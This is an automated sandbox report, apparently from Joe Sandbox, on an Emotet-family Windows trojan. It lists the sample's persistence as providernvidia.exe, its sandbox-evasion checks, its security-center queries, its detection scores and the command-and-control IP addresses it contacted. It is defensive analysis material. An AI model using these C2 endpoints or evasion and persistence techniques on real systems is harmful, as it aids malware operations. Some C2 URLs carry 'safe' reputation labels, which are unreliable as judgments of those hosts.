                    Source: 9fdUNaHzLv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: 9fdUNaHzLv.exeVirustotal: Detection: 84%
                    Source: 9fdUNaHzLv.exeReversingLabs: Detection: 96%
                    Source: unknownProcess created: C:\Users\user\Desktop\9fdUNaHzLv.exe 'C:\Users\user\Desktop\9fdUNaHzLv.exe'
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeProcess created: C:\Users\user\Desktop\9fdUNaHzLv.exe C:\Users\user\Desktop\9fdUNaHzLv.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\providernvidia.exe C:\Windows\SysWOW64\providernvidia.exe
                    Source: C:\Windows\SysWOW64\providernvidia.exeProcess created: C:\Windows\SysWOW64\providernvidia.exe C:\Windows\SysWOW64\providernvidia.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeProcess created: C:\Users\user\Desktop\9fdUNaHzLv.exe C:\Users\user\Desktop\9fdUNaHzLv.exe
                    Source: C:\Windows\SysWOW64\providernvidia.exeProcess created: C:\Windows\SysWOW64\providernvidia.exe C:\Windows\SysWOW64\providernvidia.exe
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                    Source: 9fdUNaHzLv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D11F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

                    Persistence and Installation Behavior:

                    barindex
                    Drops executables to the windows directory (C:\Windows) and starts themShow sources
                    Source: C:\Windows\SysWOW64\providernvidia.exeExecutable created and started: C:\Windows\SysWOW64\providernvidia.exe
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exePE file moved: C:\Windows\SysWOW64\providernvidia.exeJump to behavior

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile opened: C:\Windows\SysWOW64\providernvidia.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)Show sources
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeAPI coverage: 6.5 %
                    Source: C:\Windows\System32\svchost.exe TID: 5628Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile Volume queried: C:\ FullSizeInformation
                    Source: svchost.exe, 0000000A.00000002.466244484.000002A4BBE61000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                    Source: svchost.exe, 00000007.00000002.221819030.0000011003F40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.283724026.0000026CEF060000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.465548228.000001E2FC790000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.308122256.000001C80BF40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: providernvidia.exe, 00000006.00000002.463769550.00000000007A7000.00000004.00000020.sdmp, svchost.exe, 0000000A.00000002.466184270.000002A4BBE4C000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.463400537.000001D2FDC3C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 0000000D.00000002.463317483.000001D2FDC02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                    Source: svchost.exe, 00000007.00000002.221819030.0000011003F40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.283724026.0000026CEF060000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.465548228.000001E2FC790000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.308122256.000001C80BF40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: svchost.exe, 00000007.00000002.221819030.0000011003F40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.283724026.0000026CEF060000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.465548228.000001E2FC790000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.308122256.000001C80BF40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: svchost.exe, 0000000A.00000002.463565249.000002A4B662A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`C
                    Source: svchost.exe, 0000000D.00000002.463400537.000001D2FDC3C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.464006095.000001E2FBC69000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.463746343.00000142C402A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000007.00000002.221819030.0000011003F40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.283724026.0000026CEF060000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.465548228.000001E2FC790000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.308122256.000001C80BF40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Windows\SysWOW64\providernvidia.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D11F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D11BE0 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D19EE0 EntryPoint,GetProcessHeap,RtlAllocateHeap,memset,GetProcessHeap,RtlFreeHeap,ExitProcess,
                    Source: svchost.exe, 0000000F.00000002.463712753.000001C9F3790000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: svchost.exe, 0000000F.00000002.463712753.000001C9F3790000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: svchost.exe, 0000000F.00000002.463712753.000001C9F3790000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: svchost.exe, 0000000F.00000002.463712753.000001C9F3790000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\providernvidia.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D18D50 RtlGetVersion,GetNativeSystemInfo,
                    Source: C:\Windows\SysWOW64\providernvidia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    barindex
                    Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                    Source: svchost.exe, 00000013.00000002.463757283.0000025982840000.00000004.00000001.sdmpBinary or memory string: &@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000013.00000002.463821817.0000025982902000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 9fdUNaHzLv.exe, type: SAMPLE
                    Source: Yara matchFile source: 00000006.00000000.203362622.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.204527300.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.463908181.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.203725030.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.202520329.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.194691427.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.195820099.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.providernvidia.exe.d10000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection2Masquerading121Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsNative API11Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery51Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    9fdUNaHzLv.exe84%VirustotalBrowse
                    9fdUNaHzLv.exe97%ReversingLabsWin32.Trojan.Emotet
                    9fdUNaHzLv.exe100%AviraTR/Crypt.XPACK.Gen
                    9fdUNaHzLv.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.0.9fdUNaHzLv.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    5.0.providernvidia.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    6.2.providernvidia.exe.d10000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.9fdUNaHzLv.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    5.2.providernvidia.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    2.0.9fdUNaHzLv.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    2.2.9fdUNaHzLv.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    6.0.providernvidia.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://173.230.145.224:8080/6%VirustotalBrowse
                    http://173.230.145.224:8080/0%Avira URL Cloudsafe
                    http://193.169.54.12:8080/Z0%Avira URL Cloudsafe
                    http://173.230.145.224:8080/_0%Avira URL Cloudsafe
                    https://79.172.249.82:443/3%VirustotalBrowse
                    https://79.172.249.82:443/0%Avira URL Cloudsafe
                    http://193.169.54.12:8080/0%Avira URL Cloudsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    http://79.172.249.82:443/10%Avira URL Cloudsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    http://79.172.249.82:443/0%Avira URL Cloudsafe
                    http://193.169.54.12:8080/30%Avira URL Cloudsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://79.172.249.82:443/false
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                      high
                      http://173.230.145.224:8080/providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmptrue
                      • 6%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://193.169.54.12:8080/Zprovidernvidia.exe, 00000006.00000003.279590439.000000000079C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpfalse
                        high
                        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                          high
                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                            high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpfalse
                                    high
                                    http://173.230.145.224:8080/_providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpfalse
                                      high
                                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                        high
                                        http://193.169.54.12:8080/providernvidia.exe, 00000006.00000003.279590439.000000000079C000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpfalse
                                          high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000011.00000002.309051305.000001E921613000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                                            high
                                            https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000011.00000002.309109992.000001E921642000.00000004.00000001.sdmpfalse
                                              high
                                              https://%s.xboxlive.comsvchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              low
                                              https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpfalse
                                                high
                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000011.00000003.308755545.000001E921649000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://79.172.249.82:443/1providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 0000000A.00000002.465483390.000002A4BBD00000.00000002.00000001.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000011.00000002.309109992.000001E921642000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dynamic.tsvchost.exe, 00000011.00000003.308724185.000001E921662000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000011.00000002.309091104.000001E921639000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://79.172.249.82:443/providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://activity.windows.comsvchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://www.bingmapsportal.comsvchost.exe, 00000011.00000002.309051305.000001E921613000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://193.169.54.12:8080/3providernvidia.exe, 00000006.00000002.463769550.00000000007A7000.00000004.00000020.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    low
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000011.00000003.308755545.000001E921649000.00000004.00000001.sdmpfalse
                                                                                      high

                                                                                      Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      193.169.54.12
                                                                                      unknownGermany
                                                                                      49464ICFSYSTEMSDEfalse
                                                                                      173.230.145.224
                                                                                      unknownUnited States
                                                                                      63949LINODE-APLinodeLLCUSfalse
                                                                                      79.172.249.82
                                                                                      unknownHungary
                                                                                      43711SZERVERNET-HU-ASHUfalse

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.1
                                                                                      127.0.0.1

                                                                                      General Information

                                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                                      Analysis ID:380921
                                                                                      Start date:03.04.2021
                                                                                      Start time:01:03:34
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 7m 0s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:light
                                                                                      Sample file name:9fdUNaHzLv (renamed file extension from none to exe)
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:29
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
